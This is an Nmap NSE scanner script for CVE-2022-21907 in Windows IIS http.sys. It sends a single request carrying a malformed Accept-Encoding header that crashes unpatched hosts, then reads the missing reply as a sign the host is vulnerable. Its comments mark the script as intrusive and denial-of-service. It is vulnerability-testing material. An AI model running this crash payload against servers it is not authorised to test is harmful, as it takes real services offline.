-- NSE `description` field (what `nmap --script-help` prints for this script).
description = table.concat({
  "CVE-2022-21907\n",
  "Repository containing nse script for vulnerability CVE-2022-21907. ",
  "It is a component (IIS) vulnerability on Windows. ",
  "It allows remote code execution. ",
  "The vulnerability affects the kernel module http. sys, which handles most basic IIS operations.\n",
})
---
-- @name
-- CVE-2022-21907 - NSE script for vulnerability CVE-2022-21907. It is a component (IIS) vulnerability on Windows. It allows remote code execution. The vulnerability affects the kernel module http.sys, which handles most basic IIS operations.
-- @author
-- Grzegorz Piechnik
-- @usage
-- nmap --script=./nmap-CVE-2022-21907 <target>
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | nmap-CVE-2022-21907:
-- | VULNERABLE:
-- | CVE-2022-21907 - DOS
-- | State: LIKELY VULNERABLE
-- | IDs: CVE:CVE-2022-21907
---
local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
local vulns = require "vulns"
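author = "Grzegorz Piechnik <bugspace DOT com>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- The probe below is designed to crash http.sys on an unpatched host, so the
-- script must not be tagged "safe" or "default": those categories are selected
-- by `-sC` / `--script safe` and would fire the crash against every HTTP port
-- in a routine scan. "dos" and "intrusive" are the NSE categories for scripts
-- that may take a service down. The CVE id stays as a custom category so
-- `--script CVE-2022-21907` keeps working.
categories = {"vuln", "dos", "intrusive", "CVE-2022-21907"}
-- We are only interested in http requests
portrule = shortport.http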
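--- Probe one HTTP port for CVE-2022-21907 (http.sys Accept-Encoding parsing).
-- Sends a single GET / carrying the malformed Accept-Encoding header and
-- reports the host as LIKELY VULNERABLE only when no answer comes back,
-- which is how the http.sys crash looks from the client side.
--
-- This is a denial-of-service check: an affected host does not keep serving
-- after the request, so only run it against systems you are allowed to take
-- down.
--
-- @param host  nmap host table
-- @param port  nmap port table
-- @return      vulns report output for the port, or nil when the port is not
--              an HTTP port
action = function(host, port)
  -- Vulnerability record handed to the vulns library. It defaults to NOT_VULN
  -- so that every path that does not see the crash yields a negative result.
  local vuln = {
    title = "CVE-2022-21907 - DOS",
    state = vulns.STATE.NOT_VULN,
    IDS = { CVE = 'CVE-2022-21907' },
  }
  local report = vulns.Report:new(SCRIPT_NAME, host, port)

  -- portrule already restricts the script to HTTP ports; kept as a guard.
  if not shortport.http(host, port) then
    return nil
  end

  local headers = {
    ["accept-encoding"] = "AAAAAAAAAAAAAAAAAAAA, AAAAAAAAAAAAAAAAAAAAAAAAA" ..
      "BBBBBBBBBBBBBBBBBBBBBBBBBBB&AAAA&**BBBBBBBBBBBBBBBBBb**BBBBBBBBBB, " ..
      "CCCCC**CCCCCCCCCCCCCCCCC,CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC" ..
      "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, " ..
      "DDDDDDDDDDDDDDDDDDDd,DDDDDDDDDDDDDDDDDDD,************DDDDDDDDDDDD, " ..
      "DDDDDDD****************DDDDDDDD, *, ,"
  }

  stdnse.debug("Sending a constructed request")
  local response = http.generic_request(host, port.number, "GET", "/",
    { header = headers, timeout = 8 })

  -- A vulnerable http.sys crashes while parsing the header and never answers,
  -- so an absent status is the positive signal. Any real reply (for example a
  -- patched host rejecting the header with an error status) means the host is
  -- not affected. A missing status can also be a plain network failure, which
  -- is why the verdict is LIKELY_VULN rather than VULN; following the NSE
  -- convention we do not report that failure to the user separately.
  if response == nil or response.status == nil then
    vuln.state = vulns.STATE.LIKELY_VULN
  end

  return report:make_output(vuln)
end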